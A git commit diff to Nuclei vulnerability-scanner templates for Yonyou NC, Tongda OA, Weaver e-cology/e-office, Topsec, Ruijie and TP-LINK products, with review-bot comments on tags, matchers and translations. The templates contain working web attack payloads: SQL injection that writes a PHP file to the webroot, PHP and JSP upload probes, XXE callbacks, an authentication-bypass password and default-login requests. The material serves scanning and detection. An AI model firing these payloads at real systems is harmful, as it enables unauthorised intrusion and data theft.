updated templates

patch-1
Prince Chaddha 2023-09-17 21:41:07 +05:30
parent 274c14e763
commit b96825a291
35 changed files with 94 additions and 267 deletions


@ -1,79 +0,0 @@
id: yonyou-nc-bshservlet-full-check
info:
name: yonyou-nc-bshservlet-full-check
author: SleepingBag945
severity: critical
description: 测试所有BshServlet RCE端点
reference:
- https://github.com/parkourhe/yongYouNC-RCE/blob/master/poc.txt
tags: yonyou,nc
http:
- method: GET
path:
- "{{BaseURL}}/servlet/~aim/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~alm/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~ampub/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~arap/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~aum/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~cc/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~cdm/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~cmp/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~ct/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~dm/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~erm/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~fa/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~fac/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~fbm/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~ff/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~fip/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~fipub/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~fp/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~fts/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~fvm/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~gl/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~hrhi/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~hrjf/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~hrpd/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~hrpub/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~hrtrn/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~hrwa/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~ia/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~ic/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~iufo/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~modules/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~mpp/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~obm/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~pu/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~qc/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~sc/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~scmpub/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~so/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~so2/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~so3/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~so4/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~so5/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~so6/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~tam/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~tbb/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~to/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~uap/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~uapbd/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~uapde/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~uapeai/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~uapother/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~uapqe/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~uapweb/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~uapws/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~vrm/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~yer/bsh.servlet.BshServlet"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "BeanShell Test Servlet"
- type: status
status:
- 200


@ -28,12 +28,12 @@ http:
matchers:
- type: word
part: body
words :
words:
- "<methodResponse><params><param><value><base64>"
- type: word
part: header
words :
words:
- "text/xml"
- type: status


@ -17,7 +17,7 @@ http:
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",
"parameterTypes":["java.lang.Object","java.lang.String"],
"parameters":["{{randstr_2}}","webapps/nc_web/{{randstr_1}}.jsp"]}
- |
GET /{{randstr_1}}.jsp HTTP/1.1
Host: {{Hostname}}


@ -1,14 +1,14 @@
id: tp-link-tl-r470gp-ac-default-login
info:
name: TP-LINK TL-R470GP-AC Default weak password
name: TP-LINK TL-R470GP-AC - Default Login
author: SleepingBag945
severity: high
description: |
TP-LINK TL-R470GP-AC 默认口令123456
metadata:
fofa-query: title="TL-R470GP-AC"
tags: tp-link,default-login,ac
tags: tp-link,default-login,router
http:
- raw:
@ -17,18 +17,13 @@ http:
Host: {{Hostname}}
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
{"method":"do","login":{"username":"admin","password":"0KcgeXhc9TefbwK"}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"stok\""
- "\"error_code\":0"
condition: and
condition: and
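Review bot: The description on L126 is still Chinese (`TP-LINK TL-R470GP-AC 默认口令123456`) although the name on L122 was translated, and the login body on L138 sends `0KcgeXhc9TefbwK`, a value whose relationship to the documented default credential is explained nowhere in the template. A reader cannot tell whether that is a device-side encoding of the documented password or an unrelated credential, so an English description plus a comment on the value is warranted, e.g. `# device-side encoded form of the documented default credential — confirm against firmware` if that is indeed what it is. The `http` block this hunk belongs to starts outside the hunk.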


@ -1,34 +0,0 @@
id: consul-rexec-rce
info:
name: Consul Rexec RCE
author: SleepingBag945
severity: critical
description: |
Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.
metadata:
fofa-query: protocol="consul(http)"
tags: rce
http:
- raw:
- |
GET /v1/agent/self HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- '"EnableRemoteScriptChecks":true'
condition: and
- type: status
status:
- 200
# msf
# search Hashicorp
# exploit/multi/misc/consul_service_exec


@ -1,35 +0,0 @@
id: consul-service-rce
info:
name: consul-service-rce
author: SleepingBag945
severity: critical
description: |
Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.
metadata:
fofa-query: protocol="consul(http)"
tags: rce
http:
- raw:
- |
GET /v1/agent/self HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "\"EnableScriptChecks\": true"
- "\"EnableRemoteScriptChecks\": true"
condition: or
- type: status
status:
- 200
# msf
# search Hashicorp
# exploit/multi/misc/consul_service_exec


@ -2,7 +2,7 @@ id: secsslvpn-auth-bypass
info:
name: Secure Access Gateway SecSSLVPN - Authentication Bypass
author: SleepingBag945
author: SleepingBag945
severity: high
description: |
The Secure Access Gateway SecSSL 3600 secure access gateway system has an unauthorized access vulnerability. An attacker can obtain the user list and modify the user account password through the vulnerability.


@ -1,5 +1,4 @@
id: ruijie-nbr-fileupload
info:
name: Ruijie NBR fileupload.php - Arbitrary File Upload
author: SleepingBag945
@ -28,7 +27,7 @@ http:
Content-Type: image/jpeg
<?php echo "{{string}}"; unlink(__FILE__); ?>
- |
GET /ddi/server/upload/{(unknown)}.php HTTP/1.1
Host: {{Hostname}}


@ -57,7 +57,7 @@ http:
matchers-condition: and
matchers:
- type: dsl
dsl:
dsl:
- status_code_2 == 200
- contains(body_2,'{{file-upload}}')
- contains(header_2,'text/html')


@ -27,11 +27,11 @@ http:
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
Accept-Encoding: gzip
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="upload"; filename="{(unknown)}.xls"
Content-Type: application/vnd.ms-excel
<% out.println("{{string}}");%>
--59229605f98b8cf290a7b8908b34616b--


@ -1,7 +1,7 @@
id: smartbi-deserialization
info:
name: Smartbi windowunloading Interface - Deserialization
name: Smartbi windowunloading Interface - Deserialization
author: SleepingBag945
severity: high
description: |


@ -13,7 +13,7 @@ info:
max-request: 1
verified: true
fofa-query: app="TDXK-通达OA"
tags: tongda,fileupload,intrusive
tags: tongda,fileupload,intrusive,router
variables:
num: "999999999"
@ -59,6 +59,7 @@ http:
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '{{md5(num)}}'
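Review bot: The `router` tag added on L279 does not fit this template: the fofa-query on L277 (`app="TDXK-通达OA"`) identifies Tongda OA, an office-automation product, and nothing in the hunk relates to network hardware. It looks like a carry-over from the TP-LINK template edited in the same commit (L130), where the tag was introduced. Suggested line: `tags: tongda,fileupload,intrusive`. The `part: body_2` addition in the second hunk is fine as far as visible, but the `http` block it belongs to starts outside the hunk.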


@ -23,15 +23,24 @@ http:
title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
- |
POST /general/document/index.php/recv/register/insert HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))>128,1,710)))# =1&_SERVER=
matchers-condition: and
matchers:
- type: word
part: header
part: header_1
words:
- "PHPSESSID="
- "register_for/?rid="
condition: and
- type: status
status:
- 302
- type: word
part: header_2
words:
- "register_for/?rid="
negative: true
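Review bot: The status matcher on L308–L310 is not request-scoped, whereas the two word matchers around it were scoped to `header_1` and `header_2`; under `matchers-condition: and` it is unclear which of the two responses the `302` check is meant for, and if `req-condition: true` is not set above the hunk the `_1`/`_2` parts may not be evaluated at all. A `dsl` matcher with `status_code_1 == 302` would make the intent explicit. The new negative matcher on L311–L315 also deserves a comment saying why the second response must not redirect, since the inverted comparison in the request on L298 is the only hint: `# second request inverts the boolean condition; a redirect here means the endpoint does not reflect it`. The `http` block starts outside the hunk.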


@ -1,36 +0,0 @@
id: topsec-topapplb-arbitrary-login
info:
name: Topsec TopAppLB Any account Login - Arbitrary Login
author: SleepingBag945
severity: high
description: |
Any Account can log in to the background.Enter any account on the login page, the password is ;id
reference:
- https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
metadata:
max-request: 1
fofa-query: title="TopApp-LB 负载均衡系统"
tags: topsec,topapplb,misconfig
http:
- raw:
- |
POST /login_check.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
userName=admin&password=%3Bid
matchers:
- type: dsl
dsl:
- 'status_code_1 == 302 && contains(header_1,"redirect.php")'
condition: and


@ -7,7 +7,7 @@ info:
description: |
Topsec TopAppLB is vulnerable to authetication bypass .Enter any account on the login page, the password is `;id`.
reference:
- https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
- https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
metadata:
max-request: 1
verified: true
@ -24,7 +24,7 @@ http:
userName=admin&password=%3Bid
- |
GET / HTTP/1.1
GET / HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true


@ -23,7 +23,7 @@ http:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "http://{{interactsh-url}}" >]>
<!ENTITY xxe SYSTEM "http://{{interactsh-url}}" >]>
<value>&xxe;</value>
matchers-condition: and


@ -1,15 +1,15 @@
id: weaver-e-cology-verifyquicklogin-arbitrary-login
id: ecology-verifyquicklogin-auth-bypass
info:
name: weaver e-cology verifyquicklogin.jsp arbitrarylogin
name: Weaver e-cology verifyquicklogin.jsp - Auth Bypass
author: SleepingBag945
severity: high
description: 泛微OA E-Cology VerifyQuickLogin.jsp文件中存在任意管理员登录漏洞攻击者通过发送特殊的请求包可以获取管理员Session
description: There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,weaver,oa
tags: ecology,weaver,oa,auth-bypass
http:
- raw:
@ -23,19 +23,18 @@ http:
identifier=1&language=1&ipaddress=x.x.x.x
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"sessionkey\":"
- type: word
part: body
words:
- "\"message\":"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31
- 200
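Review bot: The translated description on L393 names the vendor `Panwei OA` while the name on L389 says `Weaver e-cology`; 泛微's English trade name is Weaver, so the description should read `Weaver OA E-Cology`, and the same transliteration recurs in the validate.jsp template on L432. `sending a special request package` reads as machine translation; `sending a specially crafted request` is the usual wording. Separately, the template `id` changes on L386 — if the file keeps its old name, tooling that expects the id to match the filename will reject it, and the path is not visible on this page.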


@ -1,34 +1,34 @@
id: weaver-e-cology-validate-sqli
info:
name: weaver-e-cology-validate-sqli
name: Weaver e-cology Validate.JSP - SQL Injection
author: SleepingBag945
severity: high
description: 泛微e-cology OA系统的validate.jsp文件中因为对参数capitalid过滤不严可致使SQL注入漏洞。攻击者运用该漏洞可在未授权的情况下远程发送精心构造的SQL语句从而取得数据库敏感信息。
tags: ecology,weaver,oa,sqli
description: |
In the validate.jsp file of the Panwei e-cology OA system, the parameter capitalid is not strictly filtered, which can lead to SQL injection vulnerabilities. An attacker can use this vulnerability to remotely send carefully constructed SQL statements without authorization, thereby obtaining sensitive database information.
tags: ecology,weaver,sqli
variables:
num1: "{{rand_int(40000, 44800)}}"
num2: "{{rand_int(40000, 44800)}}"
result: "{{to_number(num1)*to_number(num2)}}"
http:
- raw:
- |
POST /cpt/manage/validate.jsp?sourcestring=validateNum HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%
0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str(9039*926)&capitalnum=-10
sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%
0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str({{num1}}*{{num2}})&capitalnum=-10
matchers-condition: and
matchers:
- type: word
part: body
words:
- "8370114"
- "{{result}}"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31
# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录
- 200
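Review bot: The new `tags` on L433 drop `oa` while the verifyquicklogin template changed in the same commit keeps it (L399: `ecology,weaver,oa,auth-bypass`); the two templates should agree on their tag set. The bound `rand_int(40000, 44800)` on L435–L436 is unexplained; if it exists to keep the product below 2^31 for the database's integer type, record that with a comment such as `# keep num1*num2 below 2^31 so the server-side multiplication cannot overflow`, otherwise a later edit may widen it the way L704–L705 does. The `http` block continues past the hunk.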


@ -39,7 +39,15 @@ http:
matchers-condition: and
matchers:
- type: dsl
dsl:
dsl:
- status_code == 200
- contains(body,'Windows IP Configuration')
condition: and
- type: word
part: header
words:
- "application/json"
- "text/html"
negative: true
condition: and
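Review bot: The negated matcher added on L476–L482 does not do what its word list suggests: with `condition: and` the matcher is true only when both `application/json` and `text/html` appear in the header, and `negative: true` inverts that aggregate, so a response carrying just one of the two content types still passes. To reject a response that carries either value the inner condition must be `condition: or`. The `http` block starts outside the hunk.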


@ -35,7 +35,7 @@ http:
skip-variables-check: true
matchers:
- type: dsl
dsl:
dsl:
- "status_code_1 == 200 && contains_all(body_1,'id', 'filepath') && !contains(tolower(body), 'status\":\"error')"
- "status_code_2 == 200 && contains(header_2, 'filename=')"
- "contains(body_2, 'Program Files') || regex('root:.*:0:0:', body)"


@ -21,8 +21,8 @@ variables:
http:
- method: GET
path:
- "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
- "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version"
# - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
- "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql="
stop-at-first-match: true
matchers:
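Review bot: L504 keeps the old `hashbytes` path as a commented-out line on the new side; commented-out configuration in a published template is noise — delete it or replace it with a one-line reason it was abandoned. The path ending in an empty `sql=` on L505 is also undocumented, and with `stop-at-first-match: true` it is not obvious what response it is expected to produce; a comment such as `# empty query: exercises the endpoint's default response` (if that is the intent) would help the next maintainer. The matchers start outside the hunk.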


@ -17,7 +17,7 @@ info:
variables:
filename: "{{to_lower(rand_base(5))}}"
payload: "[group]:[1]|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile '../webroot/{(unknown)}.php']"
payload: "[group]:[1]|[groupid]:[1 union select '<?php echo md5(weaver);?>',2,3,4,5,6,7,8 into outfile '../webroot/{(unknown)}.php']"
http:
- raw:
@ -35,9 +35,7 @@ http:
- type: word
part: body_2
words:
- "PHP Version"
- "PHP Extension"
condition: and
- "758058d8987e7a9ec723bcdbec6c407e"
- type: status
status:
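Review bot: The probe on L515 calls `md5(weaver)` with an unquoted bareword; PHP 8 raises an Error for an undefined constant, so on such targets nothing is echoed and the digest matcher on L525 fails even though the upload succeeded. Because the PHP sits inside a single-quoted SQL literal, quote the string with escaped double quotes instead, `md5(\"weaver\")`. The OfficeServer template changed in this commit has the same bareword on L611, plus a stray trailing `'` after `?>` that is emitted verbatim. Hard-coding the expected digest on L525 and L621 also diverges from L288, where the same commit derives it with the `{{md5(...)}}` helper; using the helper keeps probe and matcher visibly in sync. The `http` block starts outside the hunk.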


@ -51,7 +51,7 @@ http:
matchers-condition: and
matchers:
- type: dsl
dsl:
dsl:
- "status_code_1 == 200"
- "status_code_3 == 200 && contains(body_3,'{{string}}')"
condition: and
condition: and


@ -43,7 +43,7 @@ http:
matchers-condition: and
matchers:
- type: dsl
dsl:
dsl:
- "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')"
- "contains(body_2, '{{result}}') && status_code_2 == 200"
condition: and


@ -10,7 +10,7 @@ info:
max-request: 1
fofa-query: app="泛微-EOffice"
verified: true
tags: weaver,e-office,oa,instrusive,rce
tags: weaver,e-office,intrusive,rce,file-upload
variables:
filename: "{{to_lower(rand_base(5))}}"
@ -59,7 +59,7 @@ http:
matchers-condition: and
matchers:
- type: dsl
dsl:
dsl:
- "status_code_1 == 200"
- "contains(body_2, 'attachmentID') && contains(body_2, 'attachmentName')"
- "status_code_3 == 200 && contains(body_3,'{{randstr}}')"
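Review bot: The commit introduces both spellings of the upload tag: `file-upload` on L561 (and L694, L746) but `fileupload` on L602 — where the very same commit changes `file-upload` to `fileupload` — and on L279 and L657. Pick one form for every template touched here so that a single tag filter selects the whole set; the untouched templates in this commit (L278, L656, L736) already use `fileupload`, so that is the smaller change. `tags: weaver,e-office,intrusive,rce,file-upload` also drops `oa` while the OfficeServer template on L602 keeps it. The `http` block of the second hunk continues past the hunk.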


@ -33,7 +33,7 @@ http:
matchers-condition: and
matchers:
- type: dsl
dsl:
dsl:
- "status_code_1 == 200 && contains(body_1,'{{timestamp}}')"
- "status_code_2 == 200 && contains(body_2,'<title>新建')"
condition: and
condition: and


@ -1,7 +1,7 @@
id: weaver-office-server-file-upload
info:
name: OA E-Office OfficeServer.php Arbitrary File Upload
name: OA E-Office OfficeServer.php Arbitrary File Upload
author: SleepingBag945
severity: critical
description: |
@ -12,7 +12,7 @@ info:
max-request: 1
fofa-query: app="泛微-EOffice"
verified: true
tags: weaver,e-office,oa,rce,intrusive,file-upload
tags: weaver,e-office,oa,rce,intrusive,fileupload
variables:
filename: "{{to_lower(rand_base(5))}}"
@ -31,9 +31,7 @@ http:
Content-Disposition: form-data;name="FileData";filename="{(unknown)}.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>
<?php echo md5(weaver);?>'
------WebKitFormBoundaryLpoiBFy4ANA8daew
